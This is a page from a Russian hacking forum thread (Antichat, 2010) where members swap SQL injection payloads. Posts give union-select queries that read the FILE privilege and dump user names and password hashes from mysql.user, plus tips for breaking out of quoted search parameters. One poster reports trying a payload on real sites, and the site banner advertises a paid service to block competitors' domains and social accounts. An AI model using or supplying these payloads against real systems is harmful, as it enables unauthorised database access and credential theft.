Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1109 из 2422

1109

Опции темы

Поиск в этой теме

Опции просмотра

21.01.2010, 02:50

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

тест пустая табла или нет

Цитата:

...+select+count(*)+from+....

𝕏 Twitter Reddit Telegram Копировать ссылку

21.01.2010, 18:48

Gidz

Познающий

Регистрация: 10.08.2009

Сообщений: 30

С нами: 8816961

Репутация: 4

Цитата:

Сообщение от j0ker13

тест пустая табла или нет

0 я так понял означает что таблица пуста?

21.01.2010, 15:41

erolom

Познающий

Регистрация: 14.03.2009

Сообщений: 38

С нами: 9031567

Репутация: 2

Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?

21.01.2010, 16:36

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

С нами: 9428066

Репутация: 1668

Отправить сообщение для RulleR с помощью Yahoo

Цитата:

Сообщение от erolom

Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?

Код:

site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='username'/*

* где username - имя юзера под которым работает база.

Последний раз редактировалось RulleR; 21.01.2010 в 16:39..

21.01.2010, 15:42

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

С нами: 9129884

Репутация: 240

file_priv

21.01.2010, 15:51

erolom

Познающий

Регистрация: 14.03.2009

Сообщений: 38

С нами: 9031567

Репутация: 2

Цитата:

Сообщение от M.W.N.N.

file_priv

site.com/new.php?id=-1+union+select+1,file_priv,3--
так да?
щас просто попробывал на пару сайтов ошибка вылазит =/

21.01.2010, 15:55

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

С нами: 9129884

Репутация: 240

выводит привилегии на доступ у юзеров.
site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3+from+mysql.user--

21.01.2010, 20:21

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:

Цитата:

Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (t.page_title like '%'%') or (t.brief like '%'%') or (t.metakeywords like' at line 6 in

и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный

21.01.2010, 20:36

[NiGHT]DarkAngel

Участник форума

Регистрация: 29.03.2005

Сообщений: 138

С нами: 11114426

Репутация: 129

Цитата:

Сообщение от YuNi|[c

прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:

и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный

http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

Это к примеру,т.к точного уязвимого скрипта нет.

#10

21.01.2010, 21:08

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

Цитата:

Сообщение от [NiGHT]DarkAngel

вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти

Страница 1109 из 2422

1109

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57